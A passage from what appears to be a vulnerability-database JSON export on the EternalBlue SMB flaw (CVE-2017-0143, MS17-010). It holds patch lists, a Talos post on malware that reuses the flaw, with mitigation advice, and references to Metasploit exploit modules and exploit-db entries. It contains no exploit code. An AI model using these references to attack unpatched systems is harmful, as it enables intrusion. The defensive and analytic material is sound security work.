["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-10-06T10:49:13", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-10-06T10:49:13", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012606", "KB3212646", "KB4012215", "KB3205409", "KB4012216", "KB4012213", "KB3177186", "KB3213986", "KB4012217", "KB3205401", 
"KB4012212", "KB4012598", "KB4014077", "KBMS16-110, 3187754", "KB4012214", "KB3210720", "KB3210721", "KB4013429", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": 
"KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": 
"Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {"baseScore": "8.1", "temporalScore": "7.3", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}, "_object_type": "robots.models.mscve.MsCveBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.mscve.MsCveBulletin"]}], "talosblog": [{"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/pEAlAYO6L5w/adylkuzz-uiwix-eternalrocks.html", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6", "history": [], "modified": "2017-05-23T06:16:53", "lastseen": "2017-06-30T15:02:29", "published": "2017-05-22T15:14:00", "description": "When the WannaCry attack was launched a little over a week ago, it was one of the first large scale attacks leveraging the data that was leaked by the Shadow Brokers. 
At the time the real concern was how quickly we would begin to see other threats leverage the same vulnerabilities. Over the past couple of weeks, Talos has observed other malware variants that are using the ETERNALBLUE and DOUBLEPULSAR exploits from the Shadow Brokers release as part of their campaigns. Among them were Adylkuzz, Uiwix, and EternalRocks.<br /><br />Adylkuzz is a piece of malware that uses ETERNALBLUE and DOUBLEPULSAR to install cryptocurrency mining software on the infected system. This attack actually pre-dates the WannaCry attack and has continued to deliver the cryptocurrency miner.<br /><br />Uiwix uses a similar technique to install ransomware on the infected system. When the files are encrypted, the file names include \"UIWIX\" as part of the file extension. The key difference with this malware is that, unlike WannaCry, the ransomware doesn't \"worm itself\": it only installs itself on the system it was delivered to and does not spread further on its own.<br /><a name='more'></a><br />Another malware variant we have observed being leveraged by attackers is known as EternalRocks. In this case the malware gains access to the system using ETERNALBLUE and DOUBLEPULSAR, but then just uses that access as a backdoor to install other malicious software on the infected system. One of the notable features of this malware is the 24-hour sleep/delay the malware performs before downloading the final payload, which includes multiple other exploits from the Shadow Brokers dump. This is effective at evading short-running analysis environments such as sandboxes.<br /><br />Following the success and the media coverage of WannaCry ransomware it was inevitable that we would see attacks using similar techniques to exploit vulnerable operating systems and spread other types of malware. <br /><br />Adylkuzz, Uiwix and EternalRocks are just the first examples of copycat spreading, and it is likely we will see more attacks using the same infection vector in the near future. 
The combination of the exploit (ETERNALBLUE) and the backdoor (DOUBLEPULSAR) allows attackers to install and run arbitrary code on the affected system.<br /><br />When mitigating risks, it is important to remember that the best way to prevent attacks exploiting CVE-2017-0143 to CVE-2017-0148 as described in the Microsoft Security Bulletin <a href=\"https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\">MS17-010</a> is to apply the security update as soon as it is possible for your organization. Where the update cannot be applied immediately, disabling SMBv1 and restricting exposure of TCP port 445 reduces the attack surface these exploits depend on, but it is not a substitute for patching.<br /><br /><h2 id=\"h.o34dgu4n07ad\">Coverage</h2>Talos has observed an increase in malware leveraging these vulnerabilities. The final payload has no bearing on the protection for these attacks. As long as they are leveraging the exploits and tools disclosed by the Shadow Brokers, network-based detection will stop it.<br /><br />These attacks are exploiting vulnerabilities that have been known for at least two months and, depending on the exploit, have been covered by NGIPS and NGFW technologies dating back to mid-March 2017. 
<br /><br />Snort Rule: 42329-42332, 42340, 41978, 42256 <br /><br />Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on<a href=\"https://www.snort.org/products\"> </a><a href=\"https://www.snort.org/products\">Snort.org</a>.<br /><br />Additional ways our customers can detect and block this threat are listed below.<br /><br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://1.bp.blogspot.com/--TetNIenFDw/WRY2T6Gh_tI/AAAAAAAABAI/VUP5yvEUxlYyxfm_v3LguEXy7uMaodf2wCPcB/s1600/all-no-cloudlock-esa.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" height=\"268\" src=\"https://1.bp.blogspot.com/--TetNIenFDw/WRY2T6Gh_tI/AAAAAAAABAI/VUP5yvEUxlYyxfm_v3LguEXy7uMaodf2wCPcB/s320/all-no-cloudlock-esa.png\" width=\"320\" /></a></div><br />Advanced Malware Protection (<a href=\"https://www.cisco.com/c/en/us/support/security/amp-firepower-software-license/tsd-products-support-series-home.html\">AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br /><a href=\"https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html\">CWS</a> or<a href=\"https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html\"> WSA</a> web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br />Network Security appliances such as<a href=\"https://www.cisco.com/c/en/us/products/security/asa-next-generation-firewall-services/index.html\"> </a><a href=\"https://www.cisco.com/c/en/us/products/security/asa-next-generation-firewall-services/index.html\">NGFW</a>,<a href=\"https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html\"> </a><a href=\"https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html\">NGIPS</a>, and<a 
href=\"https://meraki.cisco.com/products/appliances\"> </a><a href=\"https://meraki.cisco.com/products/appliances\">Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><a href=\"https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html\">AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.<br /><br /><a href=\"https://umbrella.cisco.com/\">Umbrella</a> prevents DNS resolution of the domains associated with malicious activity.<br /><br /><a href=\"https://www.cisco.com/c/en/us/products/security/stealthwatch/index.html\">Stealthwatch</a> detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.<br /><br /><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=pEAlAYO6L5w:NmJ_uKh_Slw:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/pEAlAYO6L5w\" height=\"1\" width=\"1\" alt=\"\"/>", "title": "Cisco Coverage for Adylkuzz, Uiwix, and EternalRocks", "cvelist": ["CVE-2017-0143"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 49, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2017-06-30T15:02:29", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", 
"THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", 
"700099.PRM", "700059.PRM"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2017-06-30T15:02:29", "rev": 2}}, "reporter": "noreply@blogger.com (Alexander Chiu)", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "talosblog", "immutableFields": [], "cvss2": {}, "cvss3": {}}], "myhack58": [{"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.myhack58.com/Article/html/3/62/2017/86371.htm", "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "cvelist", "hash": "67164609e54a9c48368f8c8211098c3c"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "5908ccc762a8ce8ab3b7aaa16c3d7b9f"}, {"key": "href", "hash": "7d4991f73aecf7d2b5314e03aed1d872"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "dfc20e0bc935ec49e080ba5d8f3ad837"}, {"key": "published", "hash": "dfc20e0bc935ec49e080ba5d8f3ad837"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "645396391020478112635e14b34a0f8b"}, {"key": "title", "hash": "59ade3b2711db2c23e61d8656b755323"}, {"key": "type", "hash": "0665a8b0792e65b50ab13aef58a018dc"}], "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", 
"AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": 
"mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2017-05-25T17:49:47", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2017-05-25T17:49:47", "rev": 2}}, "id": "MYHACK58:62201786371", "history": [{"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "## Preface\n\nSince the Shadow Brokers published NSA Elite hacking team Equation Group the use of 0-day vulnerabilities and hacker tools, hacker groups and independent hackers started to exploit these vulnerabilities and tools to initiate various attacks. But industry insiders believe that the 4 month Shadow Brokers published include high-risk Windows SMB vulnerabilities, including a series of Windows hacking tool data, is by far the most destructive of the data.\n\nWannaCry after the outbreak, security researchers have found many hackers exploit Windows SMB Vulnerability, CVE-2017-0143\uff09\uff08i.e. 
Enternal Blue for a variety of hacking activities, in addition, Eternalblue SMB vulnerability MS17-010 has been transferred to the Metasploit penetration testing framework, which allows researchers and hackers can easily take advantage of this vulnerability expand to different actions.\n\nTherefore, in addition to WannaCry this massive global attack, a large number of hacker groups, state-sponsored hackers, in order to earn money for the purpose of network criminal and grey hat hacker use Eternalblue initiated a variety of large or smaller attack, in fact, is not surprising.\n\nThe following is a security researchers recently discovered the use of the SMB vulnerability to initiate the attack, some occur in WannaCry before, and some occur in WannaCry.\n\n## One, EternalRocks worms\n\n5 on 17 May, the researchers found a product called EternalRocks New use of SMB vulnerability of the worms. With the use of two NSA vulnerability and tools WannaCry compared EternalRocks worms can be had and less. 
The worm Co-use of a four-section SMB vulnerability and three NSA hack tool include the following:\n\nEternalBlue \u2014 SMBv1 vulnerability\n\nEternalRomance \u2014 SMBv1 vulnerability\n\nEternalChampion \u2014 SMBv2 vulnerability\n\nEternalSynergy \u2014 SMBv3 vulnerability\n\nSMBTouch \u2014 SMB investigative tool\n\nArchTouch \u2014 SMB reconnaissance tool\n\n**[1] [[2]](<86371_2.htm>) [[3]](<86371_3.htm>) [[4]](<86371_4.htm>) [[5]](<86371_5.htm>) [[6]](<86371_6.htm>) [next](<86371_2.htm>)**\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2017-05-25T17:49:47", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": 
["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2017-05-25T17:49:47", "rev": 2, "value": 6.3, "vector": "NONE"}}, "hash": "f74b87ed4e300d361b44cca49e75216c6844fdc8cb3f7ec21ecb2182864a4d8f", "hashmap": [{"hash": "dfc20e0bc935ec49e080ba5d8f3ad837", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "5908ccc762a8ce8ab3b7aaa16c3d7b9f", "key": "description"}, 
{"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "59ade3b2711db2c23e61d8656b755323", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "645396391020478112635e14b34a0f8b", "key": "reporter"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "0665a8b0792e65b50ab13aef58a018dc", "key": "type"}, {"hash": "7d4991f73aecf7d2b5314e03aed1d872", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "dfc20e0bc935ec49e080ba5d8f3ad837", "key": "modified"}], "history": [], "href": "http://www.myhack58.com/Article/html/3/62/2017/86371.htm", "id": "MYHACK58:62201786371", "immutableFields": [], "lastseen": "2017-05-25T17:49:47", "modified": "2017-05-23T00:00:00", "objectVersion": "1.5", "published": "2017-05-23T00:00:00", "references": [], "reporter": "\u4f5a\u540d", "title": "The SMB vulnerability triggered\u201cbloodshed\u201d, far more than WannaCry-vulnerability warning-the black bar safety net", "type": "myhack58", "viewCount": 121}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2017-05-25T17:49:47"}], "references": [], "lastseen": "2017-05-25T17:49:47", "published": "2017-05-23T00:00:00", "description": "## Preface\n\nSince the Shadow Brokers published NSA Elite hacking team Equation Group the use of 0-day vulnerabilities and hacker tools, hacker groups and independent hackers started to exploit these vulnerabilities and tools to initiate various attacks. But industry insiders believe that the 4 month Shadow Brokers published include high-risk Windows SMB vulnerabilities, including a series of Windows hacking tool data, is by far the most destructive of the data.\n\nWannaCry after the outbreak, security researchers have found many hackers exploit Windows SMB Vulnerability, CVE-2017-0143\uff09\uff08i.e. 
